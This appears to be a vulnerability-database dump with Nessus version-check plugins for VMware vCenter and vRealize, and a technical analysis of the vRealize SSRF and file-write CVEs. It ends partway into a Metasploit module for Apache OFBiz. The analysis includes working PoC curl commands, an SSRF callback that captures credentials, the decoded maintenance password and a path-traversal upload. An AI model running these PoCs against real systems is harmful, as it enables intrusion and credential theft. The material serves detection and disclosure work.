script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vrealize_operations_manager_webui_detect.nbin\");\n script_require_keys(\"installed_sw/vRealize Operations Manager\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp = 'vRealize Operations Manager';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:443);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nconstraints = [\n {'min_version':'7.5.0', 'fixed_version':'7.5.0.17771878'},\n {'min_version':'8.0.0', 'fixed_version':'8.0.1.17771851'}, # For 8.0.0, 8.0.1\n {'min_version':'8.1.0', 'fixed_version':'8.1.1.17772462'}, # For 8.1.0, 8.1.1\n {'min_version':'8.2.0', 'fixed_version':'8.2.0.17771778'},\n {'min_version':'8.3.0', 'fixed_version':'8.3.0.17787340'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:46:11", "description": "The version of VMware vCenter Server installed on the remote host is 7.0 prior to 7.0 U2c. It is, therefore, affected by multiple vulnerabilities:\n\n - An arbitrary file upload vulnerability exists in the analytics service of vSphere Server. An unauthenticated, remote attacker can exploit this to upload arbitrary files on the remote host and execute code using a specially crafted file. (CVE-2021-22005)\n\n - A privilege escalation vulnerability exists in vCenter Server due to the way it handles session tokens. An authenticated, local attacker can exploit this to gain unauthorized access to the system. (CVE-2021-21991, CVE-2021-22015)\n\n - A reverse proxy bypass vulnerability exists in vCenter Server due to the way the endpoints handle the URI. An unauthenticated, remote attacker can exploit this to gain unauthorized access to restricted endpoints.\n (CVE-2021-22006) \n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number. Nessus has also not tested for the presence of a workaround.", "cvss3": {}, "published": "2021-09-22T00:00:00", "type": "nessus", "title": "VMware vCenter Server < 7.0 U2c Multiple Vulnerabilities (VMSA-2021-0020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21991", "CVE-2021-21992", "CVE-2021-21993", "CVE-2021-22005", "CVE-2021-22006", "CVE-2021-22007", "CVE-2021-22008", "CVE-2021-22009", "CVE-2021-22010", "CVE-2021-22014", "CVE-2021-22015", "CVE-2021-22019", "CVE-2021-22020"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_70_U2C_VMSA-2021-0020.NASL", "href": "https://www.tenable.com/plugins/nessus/153545", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153545);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2021-21991\",\n \"CVE-2021-21992\",\n \"CVE-2021-21993\",\n \"CVE-2021-22005\",\n \"CVE-2021-22006\",\n \"CVE-2021-22007\",\n \"CVE-2021-22008\",\n \"CVE-2021-22009\",\n \"CVE-2021-22010\",\n \"CVE-2021-22014\",\n \"CVE-2021-22015\",\n \"CVE-2021-22019\",\n \"CVE-2021-22020\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0434\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0045\");\n\n script_name(english:\"VMware vCenter Server < 7.0 U2c Multiple Vulnerabilities (VMSA-2021-0020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization management application installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server installed on the remote host is 7.0 prior to 7.0 U2c. It is, therefore, affected\n by multiple vulnerabilities:\n\n - An arbitrary file upload vulnerability exists in the analytics service of vSphere Server. An \n unauthenticated, remote attacker can exploit this to upload arbitrary files on the remote host \n and execute code using a specially crafted file. (CVE-2021-22005)\n\n - A privilege escalation vulnerability exists in vCenter Server due to the way it handles session tokens. \n An authenticated, local attacker can exploit this to gain unauthorized access to the system. \n (CVE-2021-21991, CVE-2021-22015)\n\n - A reverse proxy bypass vulnerability exists in vCenter Server due to the way the endpoints handle the URI. \n An unauthenticated, remote attacker can exploit this to gain unauthorized access to restricted endpoints.\n (CVE-2021-22006) \n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber. Nessus has also not tested for the presence of a workaround.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0020.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server 7.0 U2c or later or apply the workaround mentioned in the advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22014\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-22005\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware vCenter Server Analytics (CEIP) Service File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcenter_detect.nbin\");\n script_require_keys(\"Host/VMware/vCenter\", \"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\nvar fixes = make_array(\n '7.0', '18356314' # 7.0 U2c\n);\n\nvar port = get_kb_item_or_exit('Host/VMware/vCenter');\nvar version = get_kb_item_or_exit('Host/VMware/version');\nvar release = get_kb_item_or_exit('Host/VMware/release');\n\n# Extract and verify the build number\nvar build = ereg_replace(pattern:\"^VMware vCenter Server [0-9\\\\.]+ build-([0-9]+)$\", string:release, replace:\"\\1\");\nif (build !~ \"^[0-9]+$\") audit(AUDIT_UNKNOWN_BUILD, 'VMware vCenter 7.0');\n\nvar match = pregmatch(pattern:\"^VMware vCenter ([0-9]+\\.[0-9]+).*$\", string:version);\nif (isnull(match)) audit(AUDIT_OS_NOT, 'VMware vCenter 7.0');\n\nvar ver = match[1];\nif (ver !~ \"^7\\.0$\") audit(AUDIT_OS_NOT, 'VMware vCenter 7.0');\n\nvar fixed_build = int(fixes[ver]);\nif (empty_or_null(fixed_build)) audit(AUDIT_VER_FORMAT, ver);\n\nrelease = release - 'VMware vCenter Server ';\nif (build >= fixed_build)\n audit(AUDIT_LISTEN_NOT_VULN, 'VMware vCenter', port, release);\n\nvar report = '\\n VMware vCenter version : ' + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:46:25", "description": "The version of VMware vCenter Server installed on the remote host is 6.7 prior to 6.7 U3o. It is, therefore, affected by multiple vulnerabilities:\n\n - A privilege escalation vulnerability exists in vCenter Server due to the way it handles session tokens. An authenticated, local attacker can exploit this to gain unauthorized access to the system. (CVE-2021-21991, CVE-2021-22015)\n\n - A reverse proxy bypass vulnerability exists in vCenter Server due to the way the endpoints handle the URI. An unauthenticated, remote attacker can exploit this to gain unauthorized access to restricted endpoints.\n (CVE-2021-22006) \n\n - An rhttproxy bypass vulnerability exists in vCenter Server due to improper implementation of URI normalization. An unauthenticated, remote attacker can exploit this to gain access to internal endpoints. (CVE-2021-22017)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number. Nessus has also not tested for the presence of a workaround.", "cvss3": {}, "published": "2021-09-22T00:00:00", "type": "nessus", "title": "VMware vCenter Server < 6.7 Multiple Vulnerabilities (VMSA-2021-0020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21991", "CVE-2021-21992", "CVE-2021-21993", "CVE-2021-22005", "CVE-2021-22006", "CVE-2021-22007", "CVE-2021-22008", "CVE-2021-22009", "CVE-2021-22010", "CVE-2021-22011", "CVE-2021-22014", "CVE-2021-22015", "CVE-2021-22016", "CVE-2021-22017", "CVE-2021-22019", "CVE-2021-22020"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_67_U3O_VMSA-2021-0020.NASL", "href": "https://www.tenable.com/plugins/nessus/153544", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153544);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2021-21991\",\n \"CVE-2021-21992\",\n \"CVE-2021-21993\",\n \"CVE-2021-22005\",\n \"CVE-2021-22006\",\n \"CVE-2021-22007\",\n \"CVE-2021-22008\",\n \"CVE-2021-22009\",\n \"CVE-2021-22010\",\n \"CVE-2021-22011\",\n \"CVE-2021-22014\",\n \"CVE-2021-22015\",\n \"CVE-2021-22016\",\n \"CVE-2021-22017\",\n \"CVE-2021-22019\",\n \"CVE-2021-22020\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0434\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/01/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0045\");\n\n script_name(english:\"VMware vCenter Server < 6.7 Multiple Vulnerabilities (VMSA-2021-0020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization management application installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server installed on the remote host is 6.7 prior to 6.7 U3o. It is, therefore, affected \nby multiple vulnerabilities:\n\n - A privilege escalation vulnerability exists in vCenter Server due to the way it handles session tokens. \n An authenticated, local attacker can exploit this to gain unauthorized access to the system. \n (CVE-2021-21991, CVE-2021-22015)\n\n - A reverse proxy bypass vulnerability exists in vCenter Server due to the way the endpoints handle the URI. \n An unauthenticated, remote attacker can exploit this to gain unauthorized access to restricted endpoints.\n (CVE-2021-22006) \n\n - An rhttproxy bypass vulnerability exists in vCenter Server due to improper implementation of URI\n normalization. An unauthenticated, remote attacker can exploit this to gain access to internal\n endpoints. (CVE-2021-22017)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber. Nessus has also not tested for the presence of a workaround.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0020.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server 6.7 U3o or later or apply the workaround mentioned in the advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22014\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-22005\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware vCenter Server Analytics (CEIP) Service File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcenter_detect.nbin\");\n script_require_keys(\"Host/VMware/vCenter\", \"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\nvar fixes = make_array(\n '6.7', '18485166' # 6.7 U3o\n);\n\nvar port = get_kb_item_or_exit('Host/VMware/vCenter');\nvar version = get_kb_item_or_exit('Host/VMware/version');\nvar release = get_kb_item_or_exit('Host/VMware/release');\n\n# Extract and verify the build number\nvar build = ereg_replace(pattern:\"^VMware vCenter Server [0-9\\\\.]+ build-([0-9]+)$\", string:release, replace:\"\\1\");\nif (build !~ \"^[0-9]+$\") audit(AUDIT_UNKNOWN_BUILD, 'VMware vCenter 6.7');\n\nvar match = pregmatch(pattern:\"^VMware vCenter ([0-9]+\\.[0-9]+).*$\", string:version);\nif (isnull(match)) audit(AUDIT_OS_NOT, 'VMware vCenter 6.7');\n\nvar ver = match[1];\nif (ver !~ \"^6\\.7$\") audit(AUDIT_OS_NOT, 'VMware vCenter 6.7');\n\nvar fixed_build = int(fixes[ver]);\nif (empty_or_null(fixed_build)) audit(AUDIT_VER_FORMAT, ver);\n\nrelease = release - 'VMware vCenter Server ';\nif (build >= fixed_build)\n audit(AUDIT_LISTEN_NOT_VULN, 'VMware vCenter', port, release);\n\nvar report = '\\n VMware vCenter version : ' + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "seebug": [{"lastseen": "2021-07-24T16:02:59", "description": "", "cvss3": {}, "published": "2021-03-22T00:00:00", "type": "seebug", "title": "Apache OFBiz RCE\u6f0f\u6d1e\uff08CVE-2021-26295\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26295"], "modified": "2021-03-22T00:00:00", "id": "SSV:99163", "href": "https://www.seebug.org/vuldb/ssvid-99163", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-24T15:55:32", "description": "# Description\n\nOn March 30, 2021, VMware published a [security advisory](https://www.vmware.com/security/advisories/VMSA-2021-0004.html) for [CVE-2021-21975](https://nvd.nist.gov/vuln/detail/CVE-2021-21975) and [CVE-2021-21983](https://nvd.nist.gov/vuln/detail/CVE-2021-21983), two chainable vulnerabilities in its vRealize Operations Manager product. CVE-2021-21975 is an unauthenticated server-side request forgery (SSRF), while CVE-2021-21983 is an authenticated arbitrary file write. Successfully chaining both vulnerabilities achieves unauthenticated remote code execution (RCE) in vRealize Operations Manager and any product using it as a component.\n\nAt the time of public disclosure, Positive Technologies [tweeted](https://twitter.com/ptswarm/status/1376961747232382976) about CVE-2021-21975 and CVE-2021-21983, which were both discovered by their researcher [Egor Dimitrenko](https://twitter.com/elk0kc).\n\n# Affected products\n\n- vRealize Operations Manager\n - 7.0.0\n - 7.5.0\n - 8.0.0, 8.0.1\n - 8.1.0, 8.1.1\n - 8.2.0\n - 8.3.0\n- VMware Cloud Foundation (vROps)\n - 3.x\n - 4.x\n- vRealize Suite Lifecycle Manager (vROps)\n - 8.x\n\n# Technical analysis\n\nCVE-2021-21975 is the primary focus of this analysis.\n\n## CVE-2021-21975 (SSRF)\n\n`/nodes/thumbprints` (mapped to `/casa/nodes/thumbprints`) is an unauthenticated endpoint.\n\n```\n <sec:http pattern=\"/nodes/thumbprints\" security='none'/>\n```\n\nIt accepts a `POST` request whose body is a JSON array of network address strings.\n\n```\n @RequestMapping(value = {\"/nodes/thumbprints\"}, method = {RequestMethod.POST})\n @ResponseStatus(HttpStatus.OK)\n public ArrayList<ThumbprintResource> getNodesThumbprints(@RequestBody String[] addresses) {\n return this.clusterDefService.getNodesThumbprints(new HashSet(Arrays.asList((Object[])addresses)));\n }\n```\n\nEach address is sent a crafted `GET` request, leading to a partially controlled SSRF.\n\n```\n public ArrayList<ThumbprintResource> getNodesThumbprints(Set<String> addresses) {\n ArrayList<ThumbprintResource> ipToThumbprint = new ArrayList<>();\n if (null == addresses) {\n return ipToThumbprint;\n }\n configureInsecurRestTemplate();\n\n HttpMapFunction f = new HttpMapFunction(addresses.<String>toArray(new String[addresses.size()]), RequestMethod.GET, \"/node/thumbprint\", null, null, this.webappInfo, this.timeoutForGetRequest, this.restTemplate);\n\n\n\n\n\n\n\n\n HttpMapResponse[] responses = f.execute();\n\n for (HttpMapResponse resp : responses) {\n if (resp.getHttpCode() == HttpStatus.OK.value()) {\n String data = resp.getDocument().replace('\"', ' ').trim();\n ipToThumbprint.add(new ThumbprintResource(resp.getSliceAddress(), data));\n } else {\n ipToThumbprint.add(new ThumbprintResource(resp.getSliceAddress(), null));\n }\n }\n\n return ipToThumbprint;\n }\n```\n\n### PoC\n\nThe [provided workaround](https://kb.vmware.com/s/article/83210) provided enough information to develop a PoC.\n\n```\nwvu@kharak:~$ curl -k https://192.168.123.185/casa/nodes/thumbprints -H \"Content-Type: application/json\" -d '[\"192.168.123.1:8443/#\"]'\n```\n\nAppending `#` (presumably [URI fragment syntax](https://en.wikipedia.org/wiki/URI_fragment)) to the SSRF URI allows for full control of the `GET` request path.\n\n```\nwvu@kharak:~$ ncat -lkv --ssl 8443\nNcat: Version 7.91 ( https://nmap.org/ncat )\nNcat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.\nNcat: SHA-1 fingerprint: DD68 63E6 C329 1851 F74F 797A F684 7823 207A 55E7\nNcat: Listening on :::8443\nNcat: Listening on 0.0.0.0:8443\nNcat: Connection from 192.168.123.185.\nNcat: Connection from 192.168.123.185:36070.\nGET / HTTP/1.1\nAccept: application/xml, application/json\nContent-Type: application/json\nAccept-Charset: big5, big5-hkscs, cesu-8, euc-jp, euc-kr, gb18030, gb2312, gbk, ibm-thai, ibm00858, ibm01140, ibm01141, ibm01142, ibm01143, ibm01144, ibm01145, ibm01146, ibm01147, ibm01148, ibm01149, ibm037, ibm1026, ibm1047, ibm273, ibm277, ibm278, ibm280, ibm284, ibm285, ibm290, ibm297, ibm420, ibm424, ibm437, ibm500, ibm775, ibm850, ibm852, ibm855, ibm857, ibm860, ibm861, ibm862, ibm863, ibm864, ibm865, ibm866, ibm868, ibm869, ibm870, ibm871, ibm918, iso-2022-cn, iso-2022-jp, iso-2022-jp-2, iso-2022-kr, iso-8859-1, iso-8859-13, iso-8859-15, iso-8859-2, iso-8859-3, iso-8859-4, iso-8859-5, iso-8859-6, iso-8859-7, iso-8859-8, iso-8859-9, jis_x0201, jis_x0212-1990, koi8-r, koi8-u, shift_jis, tis-620, us-ascii, utf-16, utf-16be, utf-16le, utf-32, utf-32be, utf-32le, utf-8, windows-1250, windows-1251, windows-1252, windows-1253, windows-1254, windows-1255, windows-1256, windows-1257, windows-1258, windows-31j, x-big5-hkscs-2001, x-big5-solaris, x-compound_text, x-euc-jp-linux, x-euc-tw, x-eucjp-open, x-ibm1006, x-ibm1025, x-ibm1046, x-ibm1097, x-ibm1098, x-ibm1112, x-ibm1122, x-ibm1123, x-ibm1124, x-ibm1166, x-ibm1364, x-ibm1381, x-ibm1383, x-ibm300, x-ibm33722, x-ibm737, x-ibm833, x-ibm834, x-ibm856, x-ibm874, x-ibm875, x-ibm921, x-ibm922, x-ibm930, x-ibm933, x-ibm935, x-ibm937, x-ibm939, x-ibm942, x-ibm942c, x-ibm943, x-ibm943c, x-ibm948, x-ibm949, x-ibm949c, x-ibm950, x-ibm964, x-ibm970, x-iscii91, x-iso-2022-cn-cns, x-iso-2022-cn-gb, x-iso-8859-11, x-jis0208, x-jisautodetect, x-johab, x-macarabic, x-maccentraleurope, x-maccroatian, x-maccyrillic, x-macdingbat, x-macgreek, x-machebrew, x-maciceland, x-macroman, x-macromania, x-macsymbol, x-macthai, x-macturkish, x-macukraine, x-ms932_0213, x-ms950-hkscs, x-ms950-hkscs-xp, x-mswin-936, x-pck, x-sjis_0213, x-utf-16le-bom, x-utf-32be-bom, x-utf-32le-bom, x-windows-50220, x-windows-50221, x-windows-874, x-windows-949, x-windows-950, x-windows-iso2022jp\nX-VSCM-Request-Id: ak00003Y\nAuthorization: Basic bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=\nCache-Control: no-cache\nPragma: no-cache\nUser-Agent: Java/1.8.0_212\nHost: 192.168.123.1:8443\nConnection: keep-alive\n```\n\nNote the `Authorization: Basic` header, which is present in older vulnerable versions but missing from 8.3.0. The Base64 `bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=` decodes to the credentials `maintenanceAdmin:RfdsxK/5M4MSk2si174KIhDV`.\n\n## CVE-2021-21983 (file write)\n\nCVE-2021-21983 is a path traversal in the `/casa/private/config/slice/ha/certificate` endpoint.\n\n```\n @RequestMapping(value = {\"/private/config/slice/ha/certificate\"}, method = {RequestMethod.POST})\n @ResponseBody\n @ResponseStatus(HttpStatus.OK)\n @Auditable(category = Auditable.Category.CONFIG_SLICE_CERTIFICATE, auditMessage = \"Accepting replicated certificate from Master slice\")\n public void handleCertificateUpload(@RequestParam(\"name\") String name, @RequestParam(\"file\") MultipartFile multiPartFile) {\n try {\n this.certificateService.handleCertificateFile(multiPartFile, name);\n } catch (Exception e) {\n this.log.error(\"Error handling replica certificate upload: {}\", e);\n throw new CasaException(e, \"Failed to upload replica certificate\");\n }\n }\n void handleCertificateFile(MultipartFile multiPartFile, String fileName) {\n+ if (fileName == null || !fileName.equals(\"cakey.pem\")) {\n+ throw new CasaException(\"Wrong cert file name is provided\");\n+ }\n File certFile = new File(this.certDirPath, fileName);\n\n try {\n multiPartFile.transferTo(certFile);\n\n certFile.setExecutable(false, false);\n } catch (Exception e) {\n throw new CasaException(\"Error writing Certificate file: \" + certFile.getAbsolutePath(), e);\n }\n }\n```\n\n### PoC\n\n```\nwvu@kharak:~$ curl -kH \"Authorization: Basic bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=\" https://192.168.123.185/casa/private/config/slice/ha/certificate -F name=../../../../../tmp/vulnerable -F \"file=@-; filename=vulnerable\" <<<vulnerable\nwvu@kharak:~$\nroot@vRealizeClusterNode [ /tmp ]# ls -l vulnerable\n-rw-r--r-- 1 admin admin 11 Apr 5 22:18 vulnerable\nroot@vRealizeClusterNode [ /tmp ]# cat vulnerable\nvulnerable\nroot@vRealizeClusterNode [ /tmp ]#\n```\n\n## IOCs\n\nNumerous log files can be found in `/usr/lib/vmware-casa/casa-webapp/logs`. The file `/usr/lib/vmware-casa/casa-webapp/logs/casa.log` is of particular interest for tracking suspicious requests.\n\n```\n2021-04-03 07:58:33,113 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:60 - Request POST /casa/nodes/thumbprints from 192.168.123.1: New request id ak0000BL\n2021-04-03 07:58:33,113 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.HttpMapFunction:325 - execute, hosts=[192.168.123.1:8443/#], op=GET, relativeUrl=/node/thumbprint, doc={}\n2021-04-03 07:58:33,116 [ak0000BL] [pool-36-thread-1] INFO casa.support.HttpTask:128 - Making HTTP call to url=https://192.168.123.1:8443/#/casa/node/thumbprint\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - HTTP GET https://192.168.123.1:8443/#/casa/node/thumbprint\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - Accept=[text/plain, application/json, application/*+json, */*]\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - Writing [{}] as \"application/json\"\n2021-04-03 07:58:33,118 [ak0000BL] [pool-36-thread-1] INFO casa.support.MaintenanceUserUtils:33 - Maintenance User credentials initialized\n2021-04-03 07:58:43,114 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] WARN casa.support.HttpMapFunction:414 - Error retrieving HttpTask future: java.util.concurrent.CancellationException\n2021-04-03 07:58:43,116 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:93 - Request POST /casa/nodes/thumbprints: Done\n2021-04-05 22:18:22,066 [ ] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.security.UsernamePasswordAuthenticator:104 - Authenticated maintenance user 'maintenanceAdmin'\n2021-04-05 22:18:22,066 [ak0002Q9] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:60 - Request POST /casa/private/config/slice/ha/certificate from 192.168.123.1: New request id ak0002Q9\n2021-04-05 22:18:22,067 [ak0002Q9] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:93 - Request POST /casa/private/config/slice/ha/certificate: Done\n```\n\nNote that the SSRF most likely requires a callback address in order to extract the `Authorization: Basic` header and any credentials it contains.\n\n# Guidance\n\nPlease see the **Response Matrix** in the [advisory](https://www.vmware.com/security/advisories/VMSA-2021-0004.html) for fixed versions and workarounds.\n\n# References\n\n- https://www.vmware.com/security/advisories/VMSA-2021-0004.html\n- https://twitter.com/ptswarm/status/1376961747232382976", "cvss3": {}, "published": "2021-03-31T00:00:00", "type": "seebug", "title": "VMware vRealize Operations Manager SSRF\u548c\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\uff08CVE-2021-21975 CVE-2021-21983\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-03-31T00:00:00", "id": "SSV:99173", "href": "https://www.seebug.org/vuldb/ssvid-99173", "sourceData": "", "sourceHref": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-04-06T14:43:30", "description": "", "cvss3": {}, "published": "2021-04-06T00:00:00", "type": "packetstorm", "title": "Apache OFBiz SOAP Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26295"], "modified": "2021-04-06T00:00:00", "id": "PACKETSTORM:162104", "href": "https://packetstormsecurity.com/files/162104/Apache-OFBiz-SOAP-Java-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::JavaDeserialization \n \nXML_NS = { \n'serResponse' => 'http://ofbiz.apache.org/service/', \n'soapenv' => 'http://schemas.xmlsoap.org/soap/envelope/' \n}.freeze \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Apache OFBiz SOAP Java Deserialization', \n'Description' => %q{ \nThis module exploits a Java deserialization vulnerability in Apache \nOFBiz's unauthenticated SOAP endpoint /webtools/control/SOAPService for \nversions prior to 17.12.06. \n}, \n'Author' => [ \n'yumusb', # original PoC \n'Spencer McIntyre', # metasploit module \n'wvu' # metasploit module \n], \n'References' => [ \n[ 'CVE', '2021-26295' ], \n[ 'URL', 'https://github.com/yumusb/CVE-2021-26295-POC/blob/main/poc.py' ], \n[ 'URL', 'https://issues.apache.org/jira/browse/OFBIZ-12167' ] \n], \n'DisclosureDate' => '2021-03-22', # NVD publish date \n'License' => MSF_LICENSE, \n'Platform' => 